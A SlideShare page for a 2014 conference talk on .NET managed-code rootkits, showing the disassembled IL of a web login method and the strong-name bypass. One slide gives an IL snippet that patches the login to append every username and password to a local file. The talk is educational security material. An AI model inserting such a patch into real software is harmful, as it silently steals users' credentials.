SlideShare a Scribd company logo

How well do you know your runtime

Download as PPTX, PDF
Rob Gillen
Rob Gillen

This is a quick experiment in messing with the .NET framework for the purpose of showing potential attacks if someone gets root on a machine. Presented at CodeMash, January 8, 2014

Technology
1 of 17
How Well Do You Know Your Runtime? Rob Gillen @argodev This work is licensed under a Creative Commons Attribution 3.0 License.
Don’t Be Stupid The following presentation describes real attacks on real systems. Please note that most of the attacks described would be considered ILLEGAL if attempted on machines that you do not have explicit permission to test and attack. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Please remember this basic guideline: With knowledge comes responsibility.
Disclaimer The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
Credits Many ideas for this talk are derived from “Managed Code Rootkits: Hooking Into Runtime Environments”, Erez Metula, Syngress, 2011 Some ideas are from “Gray Hat Python”, Justin Seitz, No Starch, 2009 Other Ideas are from colleagues far Few ideas are my own
root·kit /ˈ otˈkit ro͞ / noun: rootkit; plural noun: rootkits a set of software tools that enable an unauthorized user to gain control of a computer system without being detected. http://google.com/search?q=define+rootkit
A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware. http://en.wikipedia.org/wiki/Rootkit
Terminology • Runtime Environment/Application-Level Virtual Machine • Java JVM • .NET Framework aka Common Language Runtime (CLR) • Android Dalvik • Intermediate Language • MS IL • Managed Code • Java • C#, VB.NET, F#, etc.
http://www.everbot.com/c-programming-language/
http://http://java.sampleexamples.com/java-is-best-suited-for-internet/
DEMO: Modifying Default Behavior
.method public hidebysig static bool Login(string userName, string password, [opt] bool persistCookie) cil managed { .param [3] = bool(false) // Code size .maxstack 26 (0x1a) 2 .locals init (bool V_0) IL_0000: call IL_0005: pop IL_0006: ldarg.0 IL_0007: class WebMatrix.WebData.ExtendedMembershipProvider WebMatrix.WebData.WebSecurity::VerifyProvider() ldarg.1 IL_0008: call bool [System.Web]System.Web.Security.Membership::ValidateUser(string, string) IL_000d: stloc.0 IL_000e: ldloc.0 IL_000f: brfalse.s IL_0011: ldarg.0 IL_0012: ldarg.2 IL_0018 IL_0013: call void [System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string, bool) IL_0018: ldloc.0 IL_0019: ret } // end of method WebSecurity::Login
// OK, let's be a little evil IL_00XX: nop IL_00XX: ldstr "C:UsersPublicmylog.txt" IL_00XX: ldarg.0 // get the username IL_00XX: ldstr "," IL_00XX: ldarg.1 // get the password IL_00XX: ldstr "rn" // set the data (concatenate the pervious strings) IL_00XX: call string System.String::Concat(string,string,string,string) // write the data IL_00XX: call void [mscorlib]System.IO.File::AppendAllText(string, string) IL_00XX: nop
Protection • Local Runtime? • Signature Checking?
Progress? Starting with the .NET Framework 3.5 Service Pack 1, strong-name signatures are not validated when an assembly is loaded into a full-trust application domain, such as the default application domain for the MyComputer zone. This is referred to as the strong-name bypass feature. In a full-trust environment, demands for StrongNameIdentityPermission always succeed for signed, full-trust assemblies, regardless of their signature. The strong-name bypass feature avoids the unnecessary overhead of strong-name signature verification of full-trust assemblies in this situation, allowing the assemblies to load faster. http://msdn.microsoft.com/en-us/library/xwb8f617%28v=vs.110%29.aspx
Mixed Success <configuration> <runtime> <bypassTrustedAppStrongNames enabled="false" /> </runtime> </configuration>
o_O .method assembly hidebysig static class System.Reflection.RuntimeAssembly InternalLoadAssemblyName( class System.Reflection.AssemblyName assemblyRef, class System.Security.Policy.Evidence assemblySecurity, class System.Reflection.RuntimeAssembly reqAssembly, valuetype System.Threading.StackCrawlMark& stackMark, native int pPrivHostBinder, bool throwOnFileNotFound, bool forIntrospection, bool suppressSecurityChecks) cil managed { method logic…
Questions/Contact Rob Gillen rob@gillenfamily.net http://rob.gillenfamily.net @argodev

Recommended

CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain SightCodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain SightRob Gillen
 
What's in a password
What's in a password What's in a password
What's in a password Rob Gillen
 
ETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerRob Gillen
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackRob Gillen
 
Software defined radio and the hacker
Software defined radio and the hackerSoftware defined radio and the hacker
Software defined radio and the hackerRob Gillen
 
Intro to GPGPU with CUDA (DevLink)
Intro to GPGPU with CUDA (DevLink)Intro to GPGPU with CUDA (DevLink)
Intro to GPGPU with CUDA (DevLink)Rob Gillen
 
AWS vs. Azure
AWS vs. AzureAWS vs. Azure
AWS vs. AzureRob Gillen
 
App locker
App lockerApp locker
App lockerConcentrated Technology
 

Recommended

CodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain SightCodeStock14: Hiding in Plain Sight
CodeStock14: Hiding in Plain SightRob Gillen
 
What's in a password
What's in a password What's in a password
What's in a password Rob Gillen
 
ETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerETCSS: Into the Mind of a Hacker
ETCSS: Into the Mind of a HackerRob Gillen
 
Anatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackAnatomy of a Buffer Overflow Attack
Anatomy of a Buffer Overflow AttackRob Gillen
 
Software defined radio and the hacker
Software defined radio and the hackerSoftware defined radio and the hacker
Software defined radio and the hackerRob Gillen
 
Intro to GPGPU with CUDA (DevLink)
Intro to GPGPU with CUDA (DevLink)Intro to GPGPU with CUDA (DevLink)
Intro to GPGPU with CUDA (DevLink)Rob Gillen
 
AWS vs. Azure
AWS vs. AzureAWS vs. Azure
AWS vs. AzureRob Gillen
 
App locker
App lockerApp locker
App lockerConcentrated Technology
 
Wonder walk in Rootkit Land by Himanshu Khokhar
Wonder walk in Rootkit Land by Himanshu KhokharWonder walk in Rootkit Land by Himanshu Khokhar
Wonder walk in Rootkit Land by Himanshu KhokharOWASP Delhi
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...apidays
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareLeigh Honeywell
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the GapWill Schroeder
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical HackingKeith Brooks
 
SmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationSmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationMalachi Jones
 
Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Stephan Chenette
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)Wail Hassan
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-FrameworkVeilFramework
 
100% Code Coverage in Real World Software
100% Code Coverage in Real World Software100% Code Coverage in Real World Software
100% Code Coverage in Real World SoftwareAndreas Czakaj
 
Ethichack 2012
Ethichack 2012Ethichack 2012
Ethichack 2012santhosh kumarRG
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best PracticesClint Edmonson
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slidesBehrouz Sadeghipour
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slidesBehrouz Sadeghipour
 
Technology Based Testing
Technology Based TestingTechnology Based Testing
Technology Based TestingAlan Richardson
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Rod Soto
 
So whats in a password
So whats in a passwordSo whats in a password
So whats in a passwordRob Gillen
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 

More Related Content

Similar to How well do you know your runtime

Wonder walk in Rootkit Land by Himanshu Khokhar
Wonder walk in Rootkit Land by Himanshu KhokharWonder walk in Rootkit Land by Himanshu Khokhar
Wonder walk in Rootkit Land by Himanshu KhokharOWASP Delhi
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...apidays
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareLeigh Honeywell
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedYury Chemerkin
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
SmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationSmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationMalachi Jones
 
Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Stephan Chenette
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)Wail Hassan
 
100% Code Coverage in Real World Software
100% Code Coverage in Real World Software100% Code Coverage in Real World Software
100% Code Coverage in Real World SoftwareAndreas Czakaj
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best PracticesClint Edmonson
 
Technology Based Testing
Technology Based TestingTechnology Based Testing
Technology Based TestingAlan Richardson
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Rod Soto
 

Similar to How well do you know your runtime (20)

Wonder walk in Rootkit Land by Himanshu Khokhar
Wonder walk in Rootkit Land by Himanshu KhokharWonder walk in Rootkit Land by Himanshu Khokhar
Wonder walk in Rootkit Land by Himanshu Khokhar
 
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
INTERFACE by apidays 2023 - Securing LLM and NLP APIs, Ads Dawson & Jared Kra...
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure software
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Stuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learnedStuxnet redux. malware attribution & lessons learned
Stuxnet redux. malware attribution & lessons learned
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
SmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_ExploitationSmartphoneHacking_Android_Exploitation
SmartphoneHacking_Android_Exploitation
 
Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013Building Custom Android Malware BruCON 2013
Building Custom Android Malware BruCON 2013
 
Module 5 (system hacking)
Module 5 (system hacking)Module 5 (system hacking)
Module 5 (system hacking)
 
The Veil-Framework
The Veil-FrameworkThe Veil-Framework
The Veil-Framework
 
100% Code Coverage in Real World Software
100% Code Coverage in Real World Software100% Code Coverage in Real World Software
100% Code Coverage in Real World Software
 
Ethichack 2012
Ethichack 2012Ethichack 2012
Ethichack 2012
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best Practices
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
 
Technology Based Testing
Technology Based TestingTechnology Based Testing
Technology Based Testing
 
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationNguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web application
 
Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms Detection of webshells in compromised perimeter assets using ML algorithms
Detection of webshells in compromised perimeter assets using ML algorithms
 

More from Rob Gillen

So whats in a password
So whats in a passwordSo whats in a password
So whats in a passwordRob Gillen
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sightRob Gillen
 
DevLink - WiFu: You think your wireless is secure?
DevLink - WiFu: You think your wireless is secure?DevLink - WiFu: You think your wireless is secure?
DevLink - WiFu: You think your wireless is secure?Rob Gillen
 
You think your WiFi is safe?
You think your WiFi is safe?You think your WiFi is safe?
You think your WiFi is safe?Rob Gillen
 
A Comparison of AWS and Azure - Part2
A Comparison of AWS and Azure - Part2A Comparison of AWS and Azure - Part2
A Comparison of AWS and Azure - Part2Rob Gillen
 
A Comparison of AWS and Azure - Part 1
A Comparison of AWS and Azure - Part 1A Comparison of AWS and Azure - Part 1
A Comparison of AWS and Azure - Part 1Rob Gillen
 
Intro to GPGPU Programming with Cuda
Intro to GPGPU Programming with CudaIntro to GPGPU Programming with Cuda
Intro to GPGPU Programming with CudaRob Gillen
 
Scaling Document Clustering in the Cloud
Scaling Document Clustering in the CloudScaling Document Clustering in the Cloud
Scaling Document Clustering in the CloudRob Gillen
 
Hands On with Amazon Web Services (StirTrek)
Hands On with Amazon Web Services (StirTrek)Hands On with Amazon Web Services (StirTrek)
Hands On with Amazon Web Services (StirTrek)Rob Gillen
 
Windows Azure: Lessons From The Field
Windows Azure: Lessons From The FieldWindows Azure: Lessons From The Field
Windows Azure: Lessons From The FieldRob Gillen
 
Amazon Web Services for the .NET Developer
Amazon Web Services for the .NET DeveloperAmazon Web Services for the .NET Developer
Amazon Web Services for the .NET DeveloperRob Gillen
 
05561 Xfer Research 02
05561 Xfer Research 0205561 Xfer Research 02
05561 Xfer Research 02Rob Gillen
 
05561 Xfer Research 01
05561 Xfer Research 0105561 Xfer Research 01
05561 Xfer Research 01Rob Gillen
 
05561 Xfer Consumer 01
05561 Xfer Consumer 0105561 Xfer Consumer 01
05561 Xfer Consumer 01Rob Gillen
 
Cloud Storage Upload Tests 02
Cloud Storage Upload Tests 02Cloud Storage Upload Tests 02
Cloud Storage Upload Tests 02Rob Gillen
 
Cloud Storage Cross Test
Cloud Storage Cross TestCloud Storage Cross Test
Cloud Storage Cross TestRob Gillen
 
Azure: Lessons From The Field
Azure: Lessons From The FieldAzure: Lessons From The Field
Azure: Lessons From The FieldRob Gillen
 

More from Rob Gillen (17)

So whats in a password
So whats in a passwordSo whats in a password
So whats in a password
 
Hiding in plain sight
Hiding in plain sightHiding in plain sight
Hiding in plain sight
 
DevLink - WiFu: You think your wireless is secure?
DevLink - WiFu: You think your wireless is secure?DevLink - WiFu: You think your wireless is secure?
DevLink - WiFu: You think your wireless is secure?
 
You think your WiFi is safe?
You think your WiFi is safe?You think your WiFi is safe?
You think your WiFi is safe?
 
A Comparison of AWS and Azure - Part2
A Comparison of AWS and Azure - Part2A Comparison of AWS and Azure - Part2
A Comparison of AWS and Azure - Part2
 
A Comparison of AWS and Azure - Part 1
A Comparison of AWS and Azure - Part 1A Comparison of AWS and Azure - Part 1
A Comparison of AWS and Azure - Part 1
 
Intro to GPGPU Programming with Cuda
Intro to GPGPU Programming with CudaIntro to GPGPU Programming with Cuda
Intro to GPGPU Programming with Cuda
 
Scaling Document Clustering in the Cloud
Scaling Document Clustering in the CloudScaling Document Clustering in the Cloud
Scaling Document Clustering in the Cloud
 
Hands On with Amazon Web Services (StirTrek)
Hands On with Amazon Web Services (StirTrek)Hands On with Amazon Web Services (StirTrek)
Hands On with Amazon Web Services (StirTrek)
 
Windows Azure: Lessons From The Field
Windows Azure: Lessons From The FieldWindows Azure: Lessons From The Field
Windows Azure: Lessons From The Field
 
Amazon Web Services for the .NET Developer
Amazon Web Services for the .NET DeveloperAmazon Web Services for the .NET Developer
Amazon Web Services for the .NET Developer
 
05561 Xfer Research 02
05561 Xfer Research 0205561 Xfer Research 02
05561 Xfer Research 02
 
05561 Xfer Research 01
05561 Xfer Research 0105561 Xfer Research 01
05561 Xfer Research 01
 
05561 Xfer Consumer 01
05561 Xfer Consumer 0105561 Xfer Consumer 01
05561 Xfer Consumer 01
 
Cloud Storage Upload Tests 02
Cloud Storage Upload Tests 02Cloud Storage Upload Tests 02
Cloud Storage Upload Tests 02
 
Cloud Storage Cross Test
Cloud Storage Cross TestCloud Storage Cross Test
Cloud Storage Cross Test
 
Azure: Lessons From The Field
Azure: Lessons From The FieldAzure: Lessons From The Field
Azure: Lessons From The Field
 

Recently uploaded

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 

How well do you know your runtime

  • 1. How Well Do You Know Your Runtime? Rob Gillen @argodev This work is licensed under a Creative Commons Attribution 3.0 License.
  • 2. Don’t Be Stupid The following presentation describes real attacks on real systems. Please note that most of the attacks described would be considered ILLEGAL if attempted on machines that you do not have explicit permission to test and attack. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations. Please remember this basic guideline: With knowledge comes responsibility.
  • 3. Disclaimer The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
  • 4. Credits Many ideas for this talk are derived from “Managed Code Rootkits: Hooking Into Runtime Environments”, Erez Metula, Syngress, 2011 Some ideas are from “Gray Hat Python”, Justin Seitz, No Starch, 2009 Other Ideas are from colleagues far Few ideas are my own
  • 5. root·kit /ˈ otˈkit ro͞ / noun: rootkit; plural noun: rootkits a set of software tools that enable an unauthorized user to gain control of a computer system without being detected. http://google.com/search?q=define+rootkit
  • 6. A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware. http://en.wikipedia.org/wiki/Rootkit
  • 7. Terminology • Runtime Environment/Application-Level Virtual Machine • Java JVM • .NET Framework aka Common Language Runtime (CLR) • Android Dalvik • Intermediate Language • MS IL • Managed Code • Java • C#, VB.NET, F#, etc.
